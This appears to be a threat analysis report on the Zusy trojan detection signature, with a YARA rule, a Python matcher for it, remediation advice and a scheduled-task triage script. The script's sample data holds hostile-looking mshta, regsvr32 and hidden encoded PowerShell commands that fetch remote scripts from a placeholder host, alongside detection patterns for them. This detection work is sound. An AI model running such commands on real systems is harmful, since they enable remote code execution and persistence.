$ analyze-threat Trojan:Win32/Zusy.MK!MTB
Trojan:Win32/Zusy.MK!MTB - Windows Defender threat signature analysis

$ cat analysis.txt
=== THREAT ANALYSIS REPORT ===
Threat Name: Trojan:Win32/Zusy.MK!MTB
Classification:
  Type: Trojan
  Platform: Win32
  Family: Zusy
  Detection Type: Concrete (known malware family with identified signatures)
  Variant: MK (specific signature variant within the malware family)
  Suffix: !MTB (detection attributed to machine learning and behavioral analysis)
  Detection Method: Behavioral (per the suffix; note that the VDM signature listed below is a static PE string match)
  Confidence: Very High
  False-Positive Risk: Low

Concrete signature match: a Trojan (a program that appears legitimate but performs malicious actions) for the 32-bit Windows platform, family Zusy.

Summary:

This is a concrete detection of Trojan:Win32/Zusy.MK!MTB, a variant of the Zusy banking Trojan family. The !MTB suffix is the one Defender attaches to detections backed by machine learning and behavioral analysis. The static signature listed below references, by name, other Defender string signatures (StringCodeForHooking, StringCodeForMshta, StringCodeForRegsvr32, StringCodeForRundll32, StringCodeForPowerShell, StringCodeForBITSJobs, StringCodeForScheduledTask and others), which indicates that the sample contains strings associated with API hooking, abuse of legitimate Windows binaries (mshta, rundll32, regsvr32), PowerShell, BITS and scheduled tasks, the usual building blocks for persistence, evasion, data exfiltration and system compromise. Treat these as capabilities suggested by strings in the binary, not as behaviour confirmed by execution.

Severity:
Critical
VDM Static Detection:
Relevant strings associated with this threat (entries prefixed !#HSTR: reference other Defender string signatures by name rather than literal strings):
 - .rsrc (PEHSTR_EXT)
 - .idata   (PEHSTR_EXT)
 - !#HSTR:StringCodeForMshta.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.C!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.L!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.O!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRegsvr32.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRundll32.A!pli (PEHSTR_EXT)
 - rundll32 (PEHSTR_EXT)
 - !#HSTR:StringCodeForBITSJobs.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForPowerShell.G!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForScheduledTask.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForDataEncoding.D!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.J!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.K!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteFileCopy.B!pli (PEHSTR_EXT)
 - !#HSTR:ExecutionGuardrails (PEHSTR_EXT)
 - !#HSTR:StringCodeForFileDeletion.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForHooking.M!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForNetshHelperDLL.A!pli (PEHSTR_EXT)
 - !#HSTR:StringCodeForRemoteServices.A!pli (PEHSTR_EXT)
YARA Rule:
rule Trojan_Win32_Zusy_MK_2147951922_0
{
    meta:
        author = "threatcheck.sh"
        detection_name = "Trojan:Win32/Zusy.MK!MTB"
        threat_id = "2147951922"
        type = "Trojan"
        platform = "Win32: Windows 32-bit platform"
        family = "Zusy"
        severity = "Critical"
        info = "MTB: Microsoft Threat Behavior"
        signature_type = "SIGNATURE_TYPE_PEHSTR_EXT"
        threshold = "30"
        strings_accuracy = "Low"
    strings:
        $x_10_1 = {40 00 00 e0 2e 72 73 72 63 00 00 00 ?? ?? ?? 00 00 40 0d 00 00}  //weight: 10, accuracy: Low
        $x_10_2 = {40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 ?? ?? 00 00 02 00 00}  //weight: 10, accuracy: Low
        $x_10_3 = {20 20 20 00 20 20 20 20 00 30 0d 00 00 10 00 00 00 38 06}  //weight: 10, accuracy: High
    condition:
        (filesize < 20MB) and
        (all of ($x*))
}
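As an added example (not code from threatcheck.sh or Microsoft), the following Python reimplements the decision logic of the rule above: the three byte patterns with `??` wildcards, the weight-and-threshold scoring that the SIGNATURE_TYPE_PEHSTR_EXT meta describes (weight 10 each, threshold 30), and the 20MB size cap. The pattern bytes are copied from the rule; the buffers produced by `build_sample` are constructed here to exercise the matcher and are not malware, and the 0x41 filler for wildcard bytes is an arbitrary choice for the demonstration.

```python
"""Reimplementation of the weighted-string logic behind the YARA rule above.

Added example (not threatcheck.sh or Microsoft code). The three byte patterns
are copied from the rule; weight 10 each and threshold 30 are its meta values.
The buffers built by build_sample() are constructed for this demo only."""
import re
from typing import Dict, List, Set, Tuple

# Hex strings exactly as in the rule; ?? is a one-byte wildcard.
PATTERNS: Dict[str, Tuple[str, int]] = {
    "$x_10_1": ("40 00 00 e0 2e 72 73 72 63 00 00 00 ?? ?? ?? 00 00 40 0d 00 00", 10),
    "$x_10_2": ("40 00 00 c0 2e 69 64 61 74 61 20 20 00 10 00 00 00 ?? ?? 00 00 02 00 00", 10),
    "$x_10_3": ("20 20 20 00 20 20 20 20 00 30 0d 00 00 10 00 00 00 38 06", 10),
}
THRESHOLD = 30               # threshold = "30" in the rule meta
MAX_SIZE = 20 * 1024 * 1024  # condition: filesize < 20MB


def hex_pattern_to_regex(pattern: str) -> "re.Pattern[bytes]":
    """Translate a YARA hex string into a compiled bytes regex.

    Fixed bytes become \\xNN escapes; ?? becomes '.' (DOTALL so 0x0a matches too).
    """
    parts = [b"." if tok == "??" else b"\\x%02x" % int(tok, 16) for tok in pattern.split()]
    return re.compile(b"".join(parts), re.DOTALL)


COMPILED = {name: (hex_pattern_to_regex(hexstr), weight)
            for name, (hexstr, weight) in PATTERNS.items()}


def score(data: bytes) -> Tuple[int, List[str]]:
    """Sum the weights of the patterns found in data; also return their names."""
    total, hits = 0, []
    for name, (regex, weight) in COMPILED.items():
        if regex.search(data):
            total += weight
            hits.append(name)
    return total, hits


def matches(data: bytes) -> bool:
    """Same verdict as the rule: under the size cap and weighted score >= threshold."""
    if len(data) >= MAX_SIZE:
        return False
    total, _ = score(data)
    return total >= THRESHOLD


def build_sample(include: Set[str]) -> bytes:
    """Constructed test buffer: an MZ stub plus the chosen patterns, wildcards filled with 0x41."""
    body = bytearray(b"MZ" + b"\x00" * 62)
    for name, (hexstr, _) in PATTERNS.items():
        if name in include:
            body += bytes(0x41 if tok == "??" else int(tok, 16) for tok in hexstr.split())
            body += b"\x00" * 16  # separator so the patterns never overlap
    return bytes(body)


if __name__ == "__main__":
    full = build_sample(set(PATTERNS))
    print("all three patterns:", score(full), "->", matches(full))
    two = build_sample({"$x_10_1", "$x_10_2"})
    print("two patterns:      ", score(two), "->", matches(two))
```

Because every pattern carries weight 10 and the threshold is 30, the weighted check is equivalent to the rule's `all of ($x*)`; with a different weight table the two would diverge, which is why the weights are kept explicit rather than folded into a boolean. To scan a real file, read it in binary mode and pass the bytes to `matches`.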
Known malware which is associated with this threat:
  Filename: 8e0a99f71e8c0d509436a4719259cd2bdf2e6253e251ff36c1fca500cb1ee292
  SHA-256:  8e0a99f71e8c0d509436a4719259cd2bdf2e6253e251ff36c1fca500cb1ee292
  Date:     08/12/2025
Remediation Steps:
Immediately isolate the affected system from the network and run a full scan with up-to-date security software. Hunt for the persistence mechanisms the signature points at (scheduled tasks, BITS jobs, netsh helper DLLs, remote services, and any task or service that launches mshta, rundll32, regsvr32 or PowerShell), for evidence of data exfiltration, and for lateral movement to other hosts. Reset every credential used on the compromised system, since Zusy is a banking Trojan and credential theft should be assumed, and rebuild from a known-clean image or backup where one is available.
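For the persistence hunt in the remediation step, this added Python (not threatcheck.sh tooling) triages exported scheduled tasks for the living-off-the-land binaries the signature references (mshta, rundll32, regsvr32, PowerShell, BITS). It assumes the CSV layout of `schtasks /query /fo CSV /v`, of which only the TaskName and "Task To Run" columns are used; the rows in SAMPLE_CSV are constructed for illustration, and the argument patterns are a starting heuristic, not an exhaustive list.

```python
"""Triage exported scheduled tasks for LOLBin abuse (mshta, rundll32, regsvr32,
PowerShell, BITS), i.e. the persistence hunt from the remediation step.

Added example, not threatcheck.sh tooling. Assumes the CSV produced by
`schtasks /query /fo CSV /v`; only TaskName and "Task To Run" are read.
SAMPLE_CSV is constructed for this demo and contains no real task data."""
import csv
import io
import re
from typing import Dict, List

LOLBINS = ("mshta", "rundll32", "regsvr32", "powershell", "pwsh",
           "bitsadmin", "wscript", "cscript")

# (regex over the lowercased command line, reason reported). Heuristics, not exhaustive.
SUSPICIOUS_ARGS = [
    (r"regsvr32.*\s/i:https?://", "regsvr32 fetching a scriptlet from a URL"),
    (r"mshta.*(https?://|javascript:|vbscript:)", "mshta running remote or inline script"),
    (r"rundll32.*(javascript:|url\.dll|\.dat\b|\.txt\b)", "rundll32 with non-DLL payload"),
    (r"(powershell|pwsh).*(-e(nc|ncodedcommand)?\s|downloadstring|\biex\b|-w(indowstyle)?\s+hidden)",
     "encoded, hidden or downloading PowerShell"),
    (r"bitsadmin.*(/transfer|/addfile)", "BITS download via bitsadmin"),
    (r"(\\appdata\\|\\temp\\|\\programdata\\|\\users\\public\\)", "payload under a user-writable path"),
]


def triage_tasks(csv_text: str) -> List[Dict[str, object]]:
    """Return one finding per task whose action uses a LOLBin, highest score first."""
    findings: List[Dict[str, object]] = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        cmd = (row.get("Task To Run") or "").strip()
        low = cmd.lower()
        if not any(binary in low for binary in LOLBINS):
            continue
        reasons = [why for rx, why in SUSPICIOUS_ARGS if re.search(rx, low)]
        findings.append({"task": row.get("TaskName", ""), "command": cmd,
                         "reasons": reasons, "score": len(reasons)})
    return sorted(findings, key=lambda f: f["score"], reverse=True)


# Constructed sample export (hostnames, task names and commands are made up).
SAMPLE_CSV = r'''"HostName","TaskName","Task To Run"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$"
"WS01","\Backup","powershell.exe -File C:\Scripts\backup.ps1"
"WS01","\WinUpd","mshta.exe http://example.invalid/u.hta"
"WS01","\Sync","regsvr32.exe /s /n /u /i:http://example.invalid/s.sct scrobj.dll"
"WS01","\Updater","rundll32.exe C:\Users\jdoe\AppData\Roaming\core.dat,Start"
"WS01","\Health","powershell.exe -nop -w hidden -enc SQBFAFgA"
'''


if __name__ == "__main__":
    for finding in triage_tasks(SAMPLE_CSV):
        print(f"[{finding['score']}] {finding['task']}: {finding['command']}")
        for reason in finding["reasons"]:
            print(f"      - {reason}")
```

On a suspect host, export with `schtasks /query /fo CSV /v > tasks.csv` and pass the file contents to `triage_tasks`. Tasks with score 0 still launch a LOLBin and deserve a look; they are only ranked below those with known-bad arguments. BITS jobs (`bitsadmin /list /allusers` or `Get-BitsTransfer -AllUsers`) need a separate export and are not covered by this parser.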
=== END REPORT ===
$ reanalyze-threat
This analysis was last updated on 08/12/2025.